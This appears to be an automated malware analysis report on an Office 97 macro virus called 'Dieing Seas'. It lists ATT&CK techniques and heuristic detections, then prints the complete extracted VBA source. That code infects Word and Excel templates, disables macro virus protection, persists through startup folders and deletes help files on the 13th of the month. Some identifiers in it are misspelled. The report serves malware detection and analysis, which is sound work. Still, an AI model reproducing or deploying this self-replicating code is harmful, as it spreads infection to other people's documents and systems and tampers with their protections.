Verdict: MALICIOUS
Risk Score: 336
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
- T1105 Ingress Tool Transfer
The sample contains legacy WordBasic and VBA macros, including an AutoOpen macro that calls other malicious functions. The RunAtStartUp subroutine explicitly creates a VBScript file at 'c:\windows\Start Menu\Programs\StartUp\StartUp.vbs' which is designed to establish persistence by importing a second-stage payload exported as 'c:\windows\system\code.infected'. The SickBomb subroutine contains a conditional message box and attempts to delete .cnt files, suggesting a destructive or disruptive intent.
Heuristics (8)
- ClamAV: Doc.Trojan.Sea-2 | critical | CLAMAV_DETECTION
  ClamAV detected this file as malware: Doc.Trojan.Sea-2
- VBA macros detected | medium | 5 related findings | OLE_VBA_MACROS
  Document contains VBA macro code
- VBA macro-virus self-replication / AV tampering | critical | OLE_VBA_MACRO_VIRUS_REPLICATION
  VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
  Matched line in script: `Grand.VBProject.VBComponents("ThisWorkbook").CodeModule.DeleteLines Grand.VBProject.VBComponents("ThisWorkbook").CodeModule.countoflines`
- CreateObject call | high | OLE_VBA_CREATEOBJ
  CreateObject call
  Matched line in script: `Print vbs; "Set WordObj=CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"`
- VBA copies the workbook into the Excel XLSTART startup folder | high | OLE_VBA_XLSTART_PERSISTENCE
  The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
  Matched line in script: `Grand.SaveAs Application.StartupPath & "\Book1.", xlNormal, , , , , , , False`
- AutoOpen macro | low | OLE_VBA_AUTOOPEN
  AutoOpen macro
  Matched line in script: `Sub AutoOpen()`
- Workbook_Open macro | low | OLE_VBA_WBOPEN
  Workbook_Open macro
  Matched line in script: `Private Sub Workbook_Open()`
- Legacy WordBasic macro-virus markers | high | OLE_LEGACY_WORDBASIC_MACRO_VIRUS
  OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4787 bytes |

SHA-256: 490b9499a4189f7c6d334229e90a69dc182591992ba3104510a0f9aed6e23667
Detection: ClamAV: Doc.Trojan.Sea-2
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "DieingSeas"
Sub DieLikeEver1()
On Error Resume Next
Dim an As Boolean, ar As Boolean
VBA.SetAttr NormalTemplate.FullName, vbNormal
Options.SaveNormalPrompt = 1 - 1
VBE.ActiveVBproject.VBComponents("DieingSeas").Export "c:\ra"
Set nonono = NormalTemplate.VBProject.VBComponents
Set acacac = ActiveDocument.VBProject.VBComponents
For x = 1 To nonono.Count
If nonono(x).Name = "DieingSeas" Then an = True
Next x
For f = 1 To acacac.Count
If acacac(f).Name = "DieingSeas" Then ar = True
Next f
If an = True And ar = False Then acacac.import "c:\ra"
If an = False And ar = True Then nonono.impory "c:\ra"
Kill "c:\ra"
End Sub
Sub AutoOpen()
On Error Resume Next
DieLikeEvery1
JmpToExcell
SickBomb
RunAtStartUp
End Sub
Sub SickBomb()
On Error Resume Next
If Day(Now) = 13 Then
MsgBox "We are Just A Drop In The Ocean!", vbApplicationModal, "Dieing Seas"
Do
Ram = InputBox("Give me a word!", "Now")
Loop Until Ram = "Die"
MsgBox "Die"
Kill "c:\windows\help\*.cnt"
End If
End Sub
Sub RunAtStartUp()
On Error Resume Next
VBE.ActiveVBproject.VBComponents("DieingSeas").Export "c:\windows\system\code.infected"
Kill "c:\windows\Start Menu\Programs\StartUp\StartUp.vbs"
Open "c:\windows\Start Menu\Programs\StartUp\StartUp.vbs" For Random As vbs
Print vbs; "On Error Resume Next"
Print vbs; "Set WordObj=CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
Print vbs; "Set NT=WordObj.NormalTemplate"
Print vbs; "NT.VBproject.Vbcomponents.import " & Chr(34) & "C:\windows\system\code.infected" & Chr(34)
Print vbs; "nt.save"
Print vbs; "WordObj.Close"
Close vbs
End Sub
Sub JumpToExcell()
On Error Resume Next
Set Exc = CreateObject("Excel.Application")
SetAttr Exc.StartupPath & "\book1.", vbNormal
Set nr = Exc.Workbooks.Add
Set rt = nr.Vbprojects.VBComponents("ThisWorkBook").CodeModule
rt.InserLines 1, VBE.ActiveVBproject.VBComponents("DieingSeas").CodeModule.Lines(1, 123)
nr.SaveAs Exc.StatUpPath & "\book1."
nr.Close
End Sub
Private Sub Workbook_Open()
On Error Resume Next
Application.ScreenUpdating = (4 - 4)
Application.EnableCancelKey = xlDisabled
Options.VirusProtection = (0 - 0)
If (Dir(Application.StartupPath & "\Book1.")) <> "" Then
SetAttr Application.StartupPath * "\Book1.", vbNormal
End If
Set Grand = Workbooks.Add
Grand.VBProject.VBComponents("ThisWorkbook").CodeModule.DeleteLines Grand.VBProject.VBComponents("ThisWorkbook").CodeModule.countoflines
f = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.Lines(1, 123)
Grand.VBProject.VBComponents("ThisWotkbook").CodeModule.AddfromString
Grand.SaveAs Application.StartupPath & "\Book1.", xlNormal, , , , , , , False
Grand.Close
Set fs = Application.FileSearch
fs.NewSearch
fs.LookIn = ActiveWorkbook.Path
fs.FileName = "*.xls"
fs.SearchSubFolders = True
fs.Execute msoSortByFileName
For x = 1 To fs.FoundFiles.Count
Set tEmp = Workbooks.Open(fs.FoundFiles(x))
If tEmp.VBProject.VBComponents("ThisWorkbook").CodeModule.Lines(1, 1) <> "Sub DieLikeEvery1()" Then
tEmp.VBProject.VBComponents("ThisWorkbook").CodeModule.DeleteLines Grand.VBProject.VBComponents("ThisWorkbook").CodeModule.countoflines
Source = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.Lines(1, 123)
tEmp.VBProject.VBComponents("ThisWotkbook").CodeModule.AddfromString
tEmp.Save
End If
tEmp.Close
Next x
Application.ScreenUpdating = True
SickBomb
JmpWord
End Sub
Sub JmpWord()
On Error Resume Next
conte = VBE.ActiveVBproject.VBComponents("DieingSeas").CodeModule.Lines(1, 123)
Set wordobj = CreateObject("Word.Application")
Set nt = wordobj.NormalTemplate.VBProject.VBComponents
Set fso = CreateObject("Scripting.FileSystemObject")
Kill "c:\ra"
Set r = fso.opentextfile("C:\ra", 2, True)
r.writeline "Attribute VB_Name = " & Chr(34) & "DieingSeas" & Chr(34)
r.writeline conte
r.Close
nt.import "c:\ra"
wordobj.NormalTemplate.Save
Kill "c:\ra"
wordobj.Quit
End Sub
Sub ViewVbCode()
MsgBox "Dll viewcode.dll Required!", vbCritical, "External Error"
End Sub
Sub ToolsMacro()
MsgBox "Dll viewcode.dll Required!", vbCritical, "External Error"
End Sub
Rem +++++++++Dieing Seas Office 97 Virus+++++++++
Rem This is a little bug that infects excel and
Rem Word at the same time :-)
Rem It isn't very good bcoz too much work lately
Rem Also it's stealth Sux
Rem In a newer Version Everything will be differnt
Rem ++++++++++++++++++++++++++++++++++++++++++++++
Rem Created By Yozak=00= for MetaPhase :-) greetz to Knowdeth & bsl4